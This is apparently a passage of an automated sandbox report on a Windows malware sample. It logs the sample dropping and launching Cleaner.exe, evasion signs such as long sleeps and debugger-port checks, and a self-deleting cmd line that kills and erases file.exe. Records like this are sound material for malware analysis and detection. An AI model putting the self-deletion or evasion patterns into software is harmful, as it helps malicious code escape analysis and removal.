Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\file.exe TID: 5128	Thread sleep count: 120 > 30
Source: C:\Users\user\Desktop\file.exe TID: 5128	Thread sleep time: -72000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5132	Thread sleep time: -60000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Bunifu_UI_v1.5.3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\dll[1]			Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\file.exe

Thread delayed: delay time: 60000

Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	File Volume queried: C:\ FullSizeInformation

Source: Cleaner.exe, 0000001E.00000002.637830251.0000022E6AF8D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
Source: file.exe, 00000000.00000000.286113047.0000000000663000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.279933925.0000000000663000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.266426572.0000000000663000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe

Memory allocated: page read and write | page guard

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe "C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f

Source: file.exe, 00000000.00000000.249049609.000000000242E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.265806163.000000000242E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: file.exe, 00000000.00000000.249049609.000000000242E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.265806163.000000000242E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: program manager
Source: file.exe, 00000000.00000000.249049609.000000000242E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.265806163.000000000242E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ZK]ZF.program manager

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Bunifu_UI_v1.5.3.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
